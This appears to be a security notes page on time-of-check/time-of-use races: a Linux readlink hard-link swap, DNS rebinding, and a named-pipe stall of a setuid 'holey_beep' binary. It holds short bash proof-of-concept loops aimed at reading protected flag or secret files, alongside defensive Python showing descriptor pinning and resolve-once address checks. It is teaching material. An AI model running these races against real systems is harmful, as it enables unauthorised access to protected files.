# TOCTOU

## Time of Check Time of Use

### Linux ReadLink

ReadLink TOCTOU PoC:

```bash
cd /home/user
cp /bin/cat 'asdf (deleted)'
# Start loop
while true; do ln /home/poetry/poerty ./asdf; (./asdf ../poetry/flag &); rm asdf; done
```
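The loop above wins a race between a program's check on a path and its later use of that path. The defensive fix is to check and use the same object: open once, inspect the descriptor with `fstat`, and read from that descriptor. The example below is added here and is not code from the original page; it uses a constructed temp-dir fixture (a "public" file, a "secret" file and a relinkable `asdf` path) and a `race_hook` callback that performs the attacker's `rm asdf; ln … asdf` step deterministically inside the window, so the check-then-use and fd-pinned readers can be compared without a timing-dependent loop.

```python
import os
import stat
import tempfile

# Constructed fixture (not from the original page): a directory holding a
# "public" file the program may read, a "secret" file it must never return,
# and a path ("asdf") that an untrusted local user can unlink and relink.
def setup_fixture():
    root = tempfile.mkdtemp(prefix="toctou_")
    public = os.path.join(root, "public.txt")
    secret = os.path.join(root, "secret.txt")
    victim = os.path.join(root, "asdf")
    with open(public, "w") as f:
        f.write("public data\n")
    with open(secret, "w") as f:
        f.write("secret data\n")
    os.link(public, victim)      # "asdf" starts life as a hard link to public.txt
    return public, secret, victim

def relink(victim, target):
    """Models the attacker's `rm asdf; ln target asdf` step as one call."""
    os.unlink(victim)
    os.link(target, victim)

def same_file(st_a, st_b):
    """True when two stat results describe the same inode on the same device."""
    return (st_a.st_dev, st_a.st_ino) == (st_b.st_dev, st_b.st_ino)

def read_check_then_use(victim, approved, race_hook=None):
    """Vulnerable: the check stats the path, the use opens the path again."""
    if not same_file(os.stat(victim), os.stat(approved)):
        raise PermissionError("not the approved file")
    if race_hook:
        race_hook()              # the window the PoC's while-loop is hammering
    with open(victim) as f:      # fresh name lookup: whatever "asdf" is *now*
        return f.read()

def read_fd_pinned(victim, approved, race_hook=None):
    """Hardened: open once, check the descriptor, read from that descriptor."""
    fd = os.open(victim, os.O_RDONLY | os.O_NOFOLLOW)   # refuse symlinks outright
    try:
        st = os.fstat(fd)        # describes the inode we hold, not the path
        if not (stat.S_ISREG(st.st_mode) and same_file(st, os.stat(approved))):
            raise PermissionError("not the approved file")
        if race_hook:
            race_hook()          # same window: the name can change, the fd cannot
        return os.read(fd, 4096).decode()
    finally:
        os.close(fd)

def attempt(reader):
    """Run one reader against a fresh fixture with the relink racing it."""
    public, secret, victim = setup_fixture()
    try:
        return reader(victim, public, race_hook=lambda: relink(victim, secret))
    except PermissionError:
        return "refused"

def demo():
    """Returns (what the vulnerable reader got, what the pinned reader got)."""
    return attempt(read_check_then_use), attempt(read_fd_pinned)

if __name__ == "__main__":
    leaked, pinned = demo()
    print("check-then-use read:", repr(leaked))
    print("fd-pinned read:     ", repr(pinned))
```

The pinned reader still refuses a path that was already swapped before the `open` (the `fstat` comparison fails), and a swap after the `open` cannot affect it because a descriptor refers to an inode, not to a name. Checks done with `readlink`, `stat`, `access` or `realpath` on a path, followed by a separate open of that path, all have the same window regardless of how clever the check is.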
### DNS

Looking up the IP of a DNS name to test whether it is in an exclusion list, then making a request to the domain name. Because the request triggers a second DNS lookup, it can resolve to an IP that is on the exclusion list.
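The safe pattern is to resolve once, check that answer, and connect to exactly that address. The example below is added here and is not code from the original page; it uses a constructed in-memory resolver whose answers for the made-up host `evil.example` flip between a public and an internal address on each lookup, and a stand-in `connect` that only records where the client ended up, so the two fetch strategies can be compared offline.

```python
import ipaddress
import itertools

# Constructed resolver (not a real DNS client): answers for "evil.example"
# alternate between a public address and an internal one, which is what a
# short-TTL rebinding setup looks like from the application's point of view.
class FlippingResolver:
    def __init__(self, answers):
        self._answers = {host: itertools.cycle(ips) for host, ips in answers.items()}

    def resolve(self, host):
        return next(self._answers[host])

def rebinding_resolver():
    return FlippingResolver({
        "evil.example": ["203.0.113.10", "10.0.0.5"],   # flips on every lookup
        "docs.example": ["198.51.100.7"],               # stable public answer
    })

# Exclusion list: address ranges the application must never connect to.
BLOCKED = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16", "::1/128", "fc00::/7",
)]

def is_blocked(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in BLOCKED)

def connect(ip, host):
    """Stand-in for socket connect + HTTP request: records where we ended up."""
    return {"connected_to": ip, "host_header": host}

def fetch_check_then_use(resolver, host):
    """Vulnerable: checks one answer, then lets the client resolve again."""
    if is_blocked(resolver.resolve(host)):
        raise PermissionError(f"{host} is in a blocked range")
    return connect(resolver.resolve(host), host)     # second lookup, may differ

def fetch_pinned(resolver, host):
    """Hardened: resolve once, check that address, connect to exactly that address."""
    ip = resolver.resolve(host)
    if is_blocked(ip):
        raise PermissionError(f"{host} is in a blocked range")
    return connect(ip, host)

def outcome(fetch, host):
    """Where a fresh resolver plus the given fetch strategy actually connects."""
    try:
        return fetch(rebinding_resolver(), host)["connected_to"]
    except PermissionError:
        return "blocked"

if __name__ == "__main__":
    for fetch in (fetch_check_then_use, fetch_pinned):
        print(fetch.__name__, "->", outcome(fetch, "evil.example"))
```

In a real client the second lookup is hidden inside the HTTP library's own `connect`, so pinning means telling the client to connect to the vetted IP while still sending the original `Host` header and TLS SNI, and repeating the resolve-check-pin step on every redirect hop rather than only on the first URL.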
### Linux

Using a pipe to create a wait state in an executable.

PoC:

```bash
cd /tmp
mkdir dev
ln -s /secret_cake_recipe /tmp/dev/console
mkfifo /tmp/xyz
/home/user/holey_beep $(seq 1 1 5000) 2> /tmp/xyz &
(sleep 30; cat - ) < /tmp/xyz &
pgrep holey_beep | head -c 100
kill -15 12
```